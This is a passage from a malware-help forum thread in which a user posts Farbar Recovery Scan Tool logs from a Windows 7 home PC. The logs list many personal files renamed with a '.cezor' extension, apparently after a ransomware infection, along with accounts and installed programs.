    2019-07-09 15:36 - 2017-11-08 17:10 - 000010417 _____ C:\Users\ADMIN\Downloads\american-text.regular (1).png.cezor
    2019-07-09 15:36 - 2017-11-08 17:09 - 000061782 _____ C:\Users\ADMIN\Downloads\logo.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:07 - 000003540 _____ C:\Users\ADMIN\Downloads\libel-suit.regular.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:01 - 000011517 _____ C:\Users\ADMIN\Downloads\american-text.regular.png.cezor
    2019-07-09 15:36 - 2017-11-08 17:00 - 000035346 _____ C:\Users\ADMIN\Downloads\american-text.regular.ttf.cezor
    2019-07-09 15:36 - 2017-11-08 16:52 - 000384954 _____ C:\Users\ADMIN\Downloads\border-in-blue.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:52 - 000239921 _____ C:\Users\ADMIN\Downloads\Osmosis.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:52 - 000025613 _____ C:\Users\ADMIN\Downloads\blue-corner-page-border-clipart.gif.cezor
    2019-07-09 15:36 - 2017-11-08 16:51 - 000039072 _____ C:\Users\ADMIN\Downloads\fancy-page-title-border3.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:50 - 000259278 _____ C:\Users\ADMIN\Downloads\bright-wallpaper-2330-2493-hd-wallpapers.jpg.cezor
    2019-07-09 15:36 - 2017-11-08 16:50 - 000046203 _____ C:\Users\ADMIN\Downloads\bb437b407d965c77a202bac20551e8a7.png.cezor
    2019-07-09 15:36 - 2017-11-08 16:49 - 000020384 _____ C:\Users\ADMIN\Downloads\1.jpg.cezor
    2019-07-09 15:36 - 2017-11-07 19:56 - 000146280 _____ C:\Users\ADMIN\Downloads\9 (1).pdf.cezor
    2019-07-09 15:36 - 2017-11-07 19:55 - 000266220 _____ C:\Users\ADMIN\Downloads\9.pdf.cezor
    2019-07-09 15:36 - 2017-10-31 12:03 - 000094201 _____ C:\Users\ADMIN\Downloads\fanart.jpg.cezor
    2019-07-09 15:36 - 2017-10-30 16:09 - 032002126 _____ C:\Users\ADMIN\Downloads\EpicInstaller-6.7.0-fortnite-47840d2b1a5d4923badaae639b1d03a2.msi.cezor
    2019-07-09 15:36 - 2017-10-01 16:58 - 000268803 _____ C:\Users\ADMIN\Downloads\pi.pdf.cezor
    2019-07-09 15:36 - 2017-10-01 14:08 - 000055990 _____ C:\Users\ADMIN\Downloads\prook1.jpg.cezor
    2019-07-09 15:36 - 2017-10-01 14:08 - 000010526 _____ C:\Users\ADMIN\Downloads\proook.jpg.cezor
    2019-07-09 15:36 - 2017-10-01 14:03 - 000455455 _____ C:\Users\ADMIN\Downloads\prook.jpg.cezor
    2019-07-09 15:36 - 2017-09-29 20:23 - 000057592 _____ C:\Users\ADMIN\Downloads\dudey.jpg.cezor
    2019-07-09 15:36 - 2017-09-29 20:22 - 000007988 _____ C:\Users\ADMIN\Downloads\dude.jpg.cezor
    2019-07-09 15:36 - 2017-09-28 20:33 - 000498139 _____ C:\Users\ADMIN\Downloads\fi.pdf.cezor
    2019-07-09 15:36 - 2017-09-28 11:59 - 000029634 _____ C:\Users\ADMIN\Downloads\blood.jpg.cezor
    2019-07-09 15:36 - 2017-09-26 20:52 - 009473479 _____ C:\Users\ADMIN\Downloads\apache-tomcat-7.0.57.zip.cezor
    2019-07-09 15:36 - 2017-09-26 15:03 - 000080339 _____ C:\Users\ADMIN\Downloads\coollooking.jpg.cezor
    2019-07-09 15:36 - 2017-09-26 13:47 - 000010656 _____ C:\Users\ADMIN\Downloads\lolol.jpg.cezor
    2019-07-09 15:36 - 2017-09-26 13:45 - 000009660 _____ C:\Users\ADMIN\Downloads\poop.jpg.cezor
    2019-07-09 15:36 - 2017-09-25 15:22 - 000037237 _____ C:\Users\ADMIN\Downloads\poo.jpg.cezor
    2019-07-09 15:36 - 2017-09-25 11:32 - 000361245 _____ C:\Users\ADMIN\Downloads\5a988f6f29d54162cfd205c28ecd971f.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 21:41 - 000094201 _____ C:\Users\ADMIN\Downloads\cool.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:28 - 001450151 _____ C:\Users\ADMIN\Downloads\hi.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:18 - 000158760 _____ C:\Users\ADMIN\Downloads\douknwomyname.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:16 - 000806630 _____ C:\Users\ADMIN\Downloads\prolol.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 18:16 - 000266019 _____ C:\Users\ADMIN\Downloads\prolollll.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 13:37 - 000052482 _____ C:\Users\ADMIN\Downloads\produde.jpg.cezor
    2019-07-09 15:36 - 2017-09-23 12:03 - 000009163 _____ C:\Users\ADMIN\Downloads\produh.jpg.cezor
    2019-07-09 15:36 - 2017-09-22 15:17 - 000018022 _____ C:\Users\ADMIN\Downloads\kraken.jpg.cezor
    2019-07-09 15:36 - 2017-09-21 13:24 - 000040195 _____ C:\Users\ADMIN\Downloads\gullivers-travels-part-1-chapter-2-questions-and-answers.pdf.cezor
    2019-07-09 15:36 - 2017-09-21 12:30 - 000056191 _____ C:\Users\ADMIN\Downloads\jade-dragon.png.cezor
    2019-07-09 15:36 - 2017-09-21 12:25 - 000296251 _____ C:\Users\ADMIN\Downloads\dragon.jpg.cezor
    2019-07-09 15:36 - 2017-09-11 19:15 - 000211629 _____ C:\Users\ADMIN\Downloads\Chapter-2(FIT9).pdf.cezor
    2019-07-09 15:36 - 2017-09-11 19:12 - 000000243 ____H C:\Users\ADMIN\Desktop\~$New Microsoft Excel Worksheet.xlsx.cezor
    2019-07-09 15:36 - 2017-05-26 12:59 - 000010198 _____ C:\Users\ADMIN\Downloads\be39ac5b7c3144cf902820b997f5a7a7.png.cezor
    2019-07-09 15:36 - 2017-03-16 12:51 - 000006921 _____ C:\Users\ADMIN\Downloads\hqdefault (2).jpg.cezor
    2019-07-09 15:36 - 2017-03-16 12:49 - 000012828 _____ C:\Users\ADMIN\Downloads\hqdefault (1).jpg.cezor
    2019-07-09 15:36 - 2017-03-16 12:49 - 000009798 _____ C:\Users\ADMIN\Downloads\hqdefault.jpg.cezor
    2019-07-09 15:36 - 2017-03-16 12:49 - 000006611 _____ C:\Users\ADMIN\Downloads\images.jpg.cezor
    2019-07-09 15:36 - 2017-03-02 13:03 - 000250896 _____ C:\Users\ADMIN\Downloads\FIFA 17 Downloader.rar.cezor
    2019-07-09 15:36 - 2017-01-29 15:31 - 001056443 _____ C:\Users\ADMIN\Downloads\719053.jpg.cezor
    2019-07-09 15:36 - 2017-01-29 14:31 - 000289302 _____ C:\Users\ADMIN\Downloads\lol.jpg.cezor
    2019-07-09 15:36 - 2017-01-29 14:27 - 000406492 _____ C:\Users\ADMIN\Downloads\league of legends.png.cezor
    2019-07-09 15:36 - 2017-01-29 14:22 - 000008966 _____ C:\Users\ADMIN\Downloads\katarina.jpg.cezor
    2019-07-09 15:36 - 2017-01-28 20:13 - 000701397 _____ C:\Users\ADMIN\Downloads\160930_(1).jpg.cezor
    2019-07-09 15:36 - 2017-01-04 14:51 - 001940796 _____ C:\Users\ADMIN\Downloads\OptiFine_1.11_HD_U_B1.jar.cezor
    2019-07-09 15:36 - 2017-01-04 10:37 - 000012182 _____ C:\Users\ADMIN\Downloads\goku3.jpg.cezor
    2019-07-09 15:36 - 2017-01-03 11:14 - 000392529 _____ C:\Users\ADMIN\Downloads\6671310569e247dea170821338886a6a.png.cezor
    2019-07-09 15:36 - 2017-01-03 11:04 - 000776438 _____ C:\Users\ADMIN\Downloads\blush.png.cezor
    2019-07-09 15:36 - 2017-01-02 21:13 - 003372328 _____ C:\Users\ADMIN\Downloads\BTS - I NEED U (Official Instrumental) +Karaoke.mp3.cezor
    2019-07-09 15:36 - 2017-01-02 21:11 - 002905344 _____ C:\Users\ADMIN\Downloads\i need u.mp3.cezor
    2019-07-09 15:36 - 2016-12-29 16:47 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator (3).zip.cezor
    2019-07-09 15:36 - 2016-12-29 16:47 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator (2).zip.cezor
    2019-07-09 15:36 - 2016-12-29 16:45 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator (1).zip.cezor
    2019-07-09 15:36 - 2016-12-29 16:17 - 000061006 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator.exe.cezor
    2019-07-09 15:36 - 2016-12-29 16:14 - 000017230 _____ C:\Users\ADMIN\Downloads\MCLeaksAuthenticator.zip.cezor
    2019-07-09 15:36 - 2016-12-29 14:22 - 000011065 _____ C:\Users\ADMIN\Downloads\goku 2.jpg.cezor
    2019-07-09 15:36 - 2016-12-29 12:44 - 000003458 _____ C:\Users\ADMIN\Downloads\goku.jpg.cezor
    2019-07-09 15:36 - 2016-12-14 16:11 - 000377943 _____ C:\Users\ADMIN\Downloads\b7e7c5a77bd54c10a753ad654d945923.png.cezor
    2019-07-09 15:36 - 2016-12-14 16:02 - 000401435 _____ C:\Users\ADMIN\Downloads\da26755f9a5b4e2b9ffbde621bc65ecf.png.cezor
    2019-07-09 15:36 - 2016-12-13 22:04 - 000033176 _____ C:\Users\ADMIN\Downloads\fc846a7a917f47b6b99962387aa9f317.png.cezor
    2019-07-09 15:36 - 2016-12-13 21:52 - 000004321 _____ C:\Users\ADMIN\Downloads\beatingheart.gif-c200.cezor
    2019-07-09 15:36 - 2016-12-13 21:51 - 000612598 _____ C:\Users\ADMIN\Downloads\48a560c8785d4aa1a30e9d36a902d5b5.png.cezor
    2019-07-09 15:36 - 2016-12-13 21:51 - 000009411 _____ C:\Users\ADMIN\Downloads\200_s.gif.cezor
    2019-07-09 15:36 - 2016-12-12 21:23 - 000126852 _____ C:\Users\ADMIN\Downloads\e6e15aeb77fd4446885de2382813dc19.jpg.cezor
    2019-07-09 15:36 - 2016-12-12 21:19 - 000013719 _____ C:\Users\ADMIN\Downloads\6c72fed907ca4513a7a9f425864fd997.png.cezor
    2019-07-09 15:36 - 2016-12-12 21:17 - 000281958 _____ C:\Users\ADMIN\Downloads\46cb3c041b554b50acd2e8aa1f5f71d9.png.cezor
    2019-07-09 15:36 - 2016-12-12 21:17 - 000015449 _____ C:\Users\ADMIN\Downloads\11123946_921374211239806_1915697730_n.jpg.cezor
    2019-07-09 15:36 - 2016-12-11 20:46 - 003162513 _____ C:\Users\ADMIN\Downloads\BLACKPINK – Playing With Fire (불장난) [Color Coded Lyrics] (ENG-ROM-HAN).mp3.cezor
    2019-07-09 15:36 - 2016-12-08 13:29 - 000027409 _____ C:\Users\ADMIN\Downloads\crocodile.png.cezor
    2019-07-09 15:36 - 2016-12-08 13:22 - 000081582 _____ C:\Users\ADMIN\Downloads\aer.png.cezor
    2019-07-09 15:36 - 2016-11-14 13:28 - 000192428 _____ C:\Users\ADMIN\Downloads\1e5545f3ff3cc693a69d1968b17364a5.jpg.cezor
    2019-07-09 15:36 - 2016-11-14 13:17 - 000434878 _____ C:\Users\ADMIN\Downloads\c3ee13ad72a14680ac74cd3fc74e195a.png.cezor
    2019-07-09 15:36 - 2016-11-14 13:17 - 000060773 _____ C:\Users\ADMIN\Downloads\caughtonjupiter.69165.jpg.cezor
    2019-07-09 15:36 - 2016-09-10 12:25 - 003203473 _____ C:\Users\ADMIN\Downloads\Sever The Ties After Dawn (Goblin Mixes & Crystal Mashup).mp3.cezor
    2019-07-09 15:36 - 2016-09-07 09:17 - 000043706 _____ C:\Users\ADMIN\Downloads\07a67d6173ff47d21b455a152d1d87b1c101dcfc_hq.jpg.cezor
    2019-07-09 15:36 - 2016-08-28 14:08 - 000348238 _____ C:\Users\ADMIN\Documents\Database1.accdb.cezor
    2019-07-09 15:36 - 2016-08-27 14:03 - 000013676 _____ C:\Users\ADMIN\Downloads\13643511_1588688208097065_409010221_n.jpg.cezor
    2019-07-09 15:36 - 2016-08-27 14:03 - 000005995 _____ C:\Users\ADMIN\Downloads\eJwNy81ugjAAAOB34bDb-JFB1cQsZKjgoBXiRLwQRSgFhELLKCx79-27fz_S0NfSWio4p2ytKOR5wxl71eQHYWnbP26Uyk3GFTk7jHCaVTROlh-gPUgt2zo0CYw-K8eEbd2SgLg7twRbcQYr0N6vifo9UBamWrczq-Ue-E-bh9H85UGhak5b48VFHPvAzcX_YiKJQ4gxiq84Lbfo6KND5QF6HVA.jpg.cezor
    2019-07-09 15:36 - 2016-08-18 10:26 - 000013691 _____ C:\Users\ADMIN\Downloads\pink-crown.svg.cezor
    2019-07-09 15:36 - 2016-08-11 14:16 - 001743209 _____ C:\Users\ADMIN\Downloads\IMG_20160810_192333161 (1).jpg.cezor
    2019-07-09 15:36 - 2016-08-11 14:14 - 001743209 _____ C:\Users\ADMIN\Downloads\IMG_20160810_192333161.jpg.cezor
    2019-07-09 15:36 - 2016-07-25 20:15 - 000002101 _____ C:\Users\ADMIN\Downloads\skin_20160725105808133381.png.cezor
    2019-07-09 15:36 - 2016-07-11 20:32 - 000093081 _____ C:\Users\ADMIN\Downloads\Mineshafter-launcher.jar.cezor
    2019-07-09 15:36 - 2016-07-06 18:58 - 000010014 _____ C:\Users\ADMIN\Documents\TIME TABLE.xlsx.cezor
    2019-07-09 15:36 - 2016-07-05 21:08 - 020035861 _____ C:\Users\ADMIN\Downloads\ModernHD 1.9.zip.cezor
    2019-07-09 15:36 - 2016-07-01 19:46 - 000024807 _____ C:\Users\ADMIN\Downloads\185133A (1).pdf.cezor
    2019-07-09 15:36 - 2016-07-01 19:44 - 000024807 _____ C:\Users\ADMIN\Downloads\185133A.pdf.cezor
    2019-07-09 15:36 - 2016-06-26 19:32 - 000059422 _____ C:\Users\ADMIN\Downloads\login.htm.cezor
    2019-07-09 15:36 - 2016-03-23 22:18 - 000016430 _____ C:\Users\ADMIN\Downloads\13955967-256-k517643.jpg.cezor
    2019-07-09 15:36 - 2016-03-23 22:17 - 000218092 _____ C:\Users\ADMIN\Downloads\bts-suga2.jpg.cezor
    2019-07-09 15:36 - 2016-03-23 22:17 - 000024953 _____ C:\Users\ADMIN\Downloads\QbTFgOTN.jpg.cezor
    2019-07-09 15:36 - 2016-03-23 22:16 - 000038625 _____ C:\Users\ADMIN\Downloads\29362-suga-zdyb.jpg.cezor
    2019-07-09 15:36 - 2016-03-22 14:09 - 000181288 _____ C:\Users\ADMIN\Downloads\4Dgpl0E.png.cezor
    2019-07-09 15:36 - 2016-03-22 13:39 - 000117301 _____ C:\Users\ADMIN\Downloads\aesthetic-green-grunge-pastel-Favim.com-2704161.jpg.cezor
    2019-07-09 15:36 - 2016-03-21 09:38 - 021586206 _____ C:\Users\ADMIN\Downloads\GihosoftAndroidRecoveryTrial5.2 (1).exe.cezor
    2019-07-09 15:36 - 2016-03-21 09:30 - 025377006 _____ C:\Users\ADMIN\Downloads\JihosoftAndroidRecoveryTrial8.2.exe.cezor
    2019-07-09 15:36 - 2016-03-21 09:11 - 021586206 _____ C:\Users\ADMIN\Downloads\GihosoftAndroidRecoveryTrial5.2.exe.cezor
    2019-07-09 15:36 - 2016-03-21 08:11 - 044957262 _____ C:\Users\ADMIN\Downloads\android-recovery.exe.cezor
    2019-07-09 15:36 - 2016-03-20 14:11 - 1078690994 _____ C:\Users\ADMIN\Downloads\Hyper Projection Performance Haikyuu!!.mkv.cezor
    2019-07-09 15:36 - 2016-03-19 22:21 - 000017402 _____ C:\Users\ADMIN\Downloads\Hyper Projection Performance Haikyuu!!.torrent.cezor
    2019-07-09 15:36 - 2016-03-19 17:26 - 000097206 _____ C:\Users\ADMIN\Downloads\RechargeReceiptTataDocomo.pdf.cezor
    2019-07-09 15:36 - 2016-03-19 08:05 - 027386358 _____ C:\Users\ADMIN\Downloads\AdbeRdr920_en_US.exe.cezor
    2019-07-09 15:36 - 2016-03-19 08:05 - 000018318 _____ C:\Users\ADMIN\Downloads\INV-101009500618-MARCH-2016.html.cezor
    2019-07-09 15:36 - 2016-03-17 20:21 - 010518509 _____ C:\Users\ADMIN\Documents\exoo.pptx.cezor
    2019-07-09 15:36 - 2016-03-17 19:51 - 027515982 _____ C:\Users\ADMIN\Downloads\CollageMaker3.8 (1).msi.cezor
    2019-07-09 15:36 - 2016-03-17 19:50 - 027515982 _____ C:\Users\ADMIN\Downloads\CollageMaker3.8.msi.cezor
    2019-07-09 15:36 - 2016-03-11 16:01 - 006978413 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U).zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:59 - 000401944 _____ C:\Users\ADMIN\Downloads\Pokemon Black - Special Palace Edition 1 by MB Hacks (Red Hack) Goomba V2.2.zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:51 - 000180266 _____ C:\Users\ADMIN\Downloads\NoGBA 2.6a-1614.zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:48 - 000971059 _____ C:\Users\ADMIN\Downloads\Pokemon Emerald.zip.cezor
    2019-07-09 15:36 - 2016-03-11 15:39 - 006706482 _____ C:\Users\ADMIN\Downloads\1649 - Pokemon Emerald (J)(Independent).zip.cezor
    2019-07-09 15:36 - 2016-03-10 20:11 - 000969662 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher (1).exe.cezor
    2019-07-09 15:36 - 2016-03-08 18:37 - 454371946 _____ C:\Users\ADMIN\Downloads\Free! seiyuu event (subtitled) (convert-video-online.com).mp4.cezor
    2019-07-09 15:36 - 2016-03-08 18:36 - 000267373 _____ C:\Users\ADMIN\Downloads\Free! -Eternal Summer- Bunkasai.***.cezor
    2019-07-09 15:36 - 2016-03-07 16:41 - 000117091 _____ C:\Users\ADMIN\Downloads\fbf585a967c451f11e110d172503c432_burned.png.cezor
    2019-07-09 15:36 - 2016-03-02 14:23 - 000174771 _____ C:\Users\ADMIN\Downloads\250895_burned.png.cezor
    2019-07-09 15:36 - 2016-02-25 10:32 - 004234160 _____ C:\Users\ADMIN\Downloads\3,2,1 GO !.mp3.cezor
    2019-07-09 15:36 - 2016-02-21 10:14 - 003812857 _____ C:\Users\ADMIN\Downloads\Seum Dero - Flow.mp3.cezor
    2019-07-09 15:36 - 2016-02-13 12:37 - 105455132 _____ C:\Users\ADMIN\Downloads\Minions-2015-HDTS-1-HD.avi.cezor
    2019-07-09 15:36 - 2016-02-13 12:32 - 124017058 _____ C:\Users\ADMIN\Downloads\Minions-2015-HDTS.3gp.cezor
    2019-07-09 15:36 - 2016-02-12 21:26 - 004270941 _____ C:\Users\ADMIN\Downloads\San Holo - We Rise.mp3.cezor
    2019-07-09 15:36 - 2016-02-12 10:30 - 002599940 _____ C:\Users\ADMIN\Downloads\Minions remix banana.mp3.cezor
    2019-07-09 15:36 - 2016-02-09 15:19 - 003201801 _____ C:\Users\ADMIN\Downloads\Mark Vank & Miza - New Era (Voldex Remix).mp3.cezor
    2019-07-09 15:36 - 2016-02-05 20:56 - 003475146 _____ C:\Users\ADMIN\Downloads\OWN SONG!! -- Iggy - Troxx.mp3.cezor
    2019-07-09 15:36 - 2016-01-31 19:09 - 001962825 _____ C:\Users\ADMIN\Downloads\night_lights_buildings_railway_station_ueno_tokyo_59511_3840x1200.jpg.cezor
    2019-07-09 15:36 - 2016-01-28 19:59 - 004876981 _____ C:\Users\ADMIN\Downloads\Sex Whales & Roee Yeger - Where Was I (feat. Ashley Apollodor) [NCS Release].mp3.cezor
    2019-07-09 15:36 - 2016-01-26 17:18 - 001606117 _____ C:\Users\ADMIN\Documents\amekshirmi.docx.cezor
    2019-07-09 15:36 - 2016-01-24 17:06 - 003425411 _____ C:\Users\ADMIN\Downloads\Pitbull - Timber ft. Ke$ha.mp3.cezor
    2019-07-09 15:36 - 2016-01-08 14:42 - 000358852 _____ C:\Users\ADMIN\Downloads\photo_0160090905bucsen.jpg.cezor
    2019-07-09 15:36 - 2016-01-07 21:17 - 147456688 _____ C:\Users\ADMIN\Downloads\LeoRPGSetup.exe.cezor
    2019-07-09 15:36 - 2015-12-31 18:30 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (4).exe.cezor
    2019-07-09 15:36 - 2015-12-31 18:29 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (3).exe.cezor
    2019-07-09 15:36 - 2015-12-28 14:14 - 000052182 _____ C:\Users\ADMIN\Downloads\Agar Minions - Silver package [BY - GAMELION].rar.cezor
    2019-07-09 15:36 - 2015-12-25 21:22 - 000248710 _____ C:\Users\ADMIN\Downloads\Firefox Setup Stub 43.0.2.exe.cezor
    2019-07-09 15:36 - 2015-12-24 12:13 - 000000677 _____ C:\Users\ADMIN\Downloads\agarplus (1).user.js.cezor
    2019-07-09 15:36 - 2015-12-24 12:12 - 000000677 _____ C:\Users\ADMIN\Downloads\agarplus.user.js.cezor
    2019-07-09 15:36 - 2015-12-24 09:33 - 000000687 _____ C:\Users\ADMIN\Downloads\agarelite.user.js.cezor
    2019-07-09 15:36 - 2015-12-22 11:59 - 003666030 _____ C:\Users\ADMIN\Downloads\Ogar-master (1).zip.cezor
    2019-07-09 15:36 - 2015-12-19 20:40 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (2).exe.cezor
    2019-07-09 15:36 - 2015-12-19 20:37 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584 (1).exe.cezor
    2019-07-09 15:36 - 2015-12-19 20:35 - 008818766 _____ C:\Users\ADMIN\Downloads\hamachi.msi.cezor
    2019-07-09 15:36 - 2015-12-19 20:24 - 003183744 _____ C:\Users\ADMIN\Downloads\Ogar-master.zip.cezor
    2019-07-09 15:36 - 2015-12-19 20:16 - 008209163 _____ C:\Users\ADMIN\Downloads\Ogar-windows-9bec584.exe.cezor
    2019-07-09 15:36 - 2015-12-14 21:53 - 000039062 _____ C:\Users\ADMIN\Downloads\953781C6FDBAD6D0E57BC395CC36ED8BFE025B79.torrent.cezor
    2019-07-09 15:36 - 2015-12-13 21:56 - 000002593 _____ C:\Users\ADMIN\Downloads\Skin %23670673.png.cezor
    2019-07-09 15:36 - 2015-12-08 18:29 - 002424910 _____ C:\Users\ADMIN\Downloads\E30F.tmp.cezor
    2019-07-09 15:36 - 2015-12-05 15:10 - 049268612 _____ C:\Users\ADMIN\Downloads\LIFE 128x (Vers. 81).zip.cezor
    2019-07-09 15:36 - 2015-11-27 20:01 - 066933225 _____ C:\Users\ADMIN\Downloads\Minecraft launcher Team Extreme.rar.cezor
    2019-07-09 15:36 - 2015-11-26 20:11 - 000019264 _____ C:\Users\ADMIN\Downloads\76B303D91A107F9EB8E78A19E166BE9C3C0F9834.torrent.cezor
    2019-07-09 15:36 - 2015-11-20 13:00 - 000969662 _____ C:\Users\ADMIN\Downloads\RobloxPlayerLauncher.exe.cezor
    2019-07-09 15:36 - 2015-11-14 21:58 - 000016876 _____ C:\Users\ADMIN\Downloads\07db74-JobsV (1).rar.cezor
    2019-07-09 15:36 - 2015-11-14 21:53 - 000662175 _____ C:\Users\ADMIN\Downloads\ScriptHookV_1.0.505.2a (1).zip.cezor
    2019-07-09 15:36 - 2015-11-14 21:50 - 000662175 _____ C:\Users\ADMIN\Downloads\ScriptHookV_1.0.505.2a.zip.cezor
    2019-07-09 15:36 - 2015-11-12 21:17 - 185404150 _____ C:\Users\ADMIN\Downloads\GTAV_Setup_Tool.exe.cezor
    2019-07-09 15:36 - 2015-11-12 18:20 - 000008580 _____ C:\Users\ADMIN\Downloads\GN31OH4.png.cezor
    2019-07-09 15:36 - 2015-11-11 22:04 - 000016876 _____ C:\Users\ADMIN\Downloads\07db74-JobsV.rar.cezor
    2019-07-09 15:36 - 2015-11-11 12:31 - 000172432 _____ C:\Users\ADMIN\Downloads\b1fbfd-AnimalArkShelter1.2.zip.cezor
    2019-07-09 15:36 - 2015-11-08 17:39 - 002141021 _____ C:\Users\ADMIN\Downloads\One Direction - Drag Me Down (pictures + Lyrics).mp3.cezor
    2019-07-09 15:36 - 2015-11-08 17:22 - 003228134 _____ C:\Users\ADMIN\Downloads\Party In The USA lyrics.mp3.cezor
    2019-07-09 15:36 - 2015-11-07 13:47 - 075858190 _____ C:\Users\ADMIN\Downloads\AdbeRdr11010_en_US.exe.cezor
    2019-07-09 15:36 - 2015-11-07 13:47 - 043485206 _____ C:\Users\ADMIN\Downloads\Firefox Setup 43.0b1.exe.cezor
    2019-07-09 15:36 - 2015-11-07 13:47 - 037460940 _____ C:\Users\ADMIN\Downloads\K-Lite_Codec_Pack_1155_Full.exe.cezor
    2019-07-09 15:36 - 2015-11-07 11:28 - 000584366 _____ C:\Users\ADMIN\Downloads\jxpiinstall(1).exe.cezor
    2019-07-09 15:36 - 2015-11-07 11:24 - 000584366 _____ C:\Users\ADMIN\Downloads\jxpiinstall.exe.cezor
    2019-07-09 15:36 - 2015-11-07 11:21 - 300325630 _____ C:\Users\ADMIN\Downloads\358.87-desktop-win8-win7-winvista-64bit-international-whql.exe.cezor
    2019-07-09 15:36 - 2015-11-07 09:11 - 002530486 _____ C:\Users\ADMIN\Downloads\setup-lightshot.exe.cezor
    2019-07-09 15:35 - 2016-03-21 08:15 - 000000000 ____D C:\Users\ADMIN\.android
    2019-07-09 15:35 - 2015-11-07 11:26 - 000000000 ____D C:\Users\ADMIN\.oracle_jre_usage
    2019-07-08 16:18 - 2015-11-07 13:42 - 000000000 ____D C:\Users\ADMIN\AppData\Local\VirtualStore
    2019-07-06 20:54 - 2015-11-07 11:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
    2019-07-06 20:54 - 2015-11-07 11:25 - 000000000 ____D C:\Program Files (x86)\Java
    2019-07-06 20:53 - 2015-11-07 11:25 - 000099192 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
    2019-07-06 20:51 - 2015-11-07 11:25 - 000000000 ____D C:\ProgramData\Oracle
    2019-07-03 20:20 - 2019-03-05 15:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roblox
    2019-07-03 20:20 - 2018-08-17 12:46 - 000001315 _____ C:\Users\ADMIN\Desktop\Roblox Player.lnk
    2019-07-03 20:20 - 2018-08-17 12:46 - 000001134 _____ C:\Users\ADMIN\Desktop\Roblox Studio.lnk
    2019-06-25 15:06 - 2019-05-15 15:30 - 000000000 ____D C:\Program Files (x86)\Minecraft Launcher
    2019-06-25 14:57 - 2018-07-05 16:30 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
    2019-06-19 19:50 - 2019-02-26 11:45 - 000000000 ____D C:\Users\ADMIN\AppData\Local\BitTorrentHelper

    ==================== Files in the root of some directories ================

    2018-10-29 14:31 - 2019-07-10 17:13 - 000000413 _____ () C:\Users\ADMIN\AppData\Roaming\WB.CFG

    ==================== SigCheck ===============================

    (There is no automatic fix for files that do not pass verification.)


    LastRegBack: 2019-07-12 20:21
    ==================== End of FRST.txt ============================
     
  14. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    Addition.txt:

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-07-2019
    Ran by ADMIN (15-07-2019 16:41:26)
    Running from C:\Users\ADMIN\Desktop
    Windows 7 Ultimate (X64) (2015-11-07 08:11:11)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    ADMIN (S-1-5-21-3161437104-263828448-1275724104-1000 - Administrator - Enabled) => C:\Users\ADMIN
    Administrator (S-1-5-21-3161437104-263828448-1275724104-500 - Administrator - Disabled)
    children (S-1-5-21-3161437104-263828448-1275724104-1003 - Limited - Enabled) => C:\Users\children
    Guest (S-1-5-21-3161437104-263828448-1275724104-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-3161437104-263828448-1275724104-1002 - Limited - Enabled)

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
    AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
    AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
    Bandicam MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandicam.com)
    Collage Maker (HKLM-x32\...\{05F2884D-89AC-4DE4-A63D-7DB3FE3398DC}) (Version: 3.80 - Galleria Software)
    Epic Games Launcher (HKLM-x32\...\{6F15D7C1-3079-4135-B8E9-8D3EA033EE3A}) (Version: 1.1.129.0 - Epic Games, Inc.)
    Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 75.0.3770.100 - Google LLC)
    Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
    Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games)
    IGdm 2.6.5 (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\1ead4f81-c61a-5fa6-9e81-7a8c0c868952) (Version: 2.6.5 - ifedapo olarewaju)
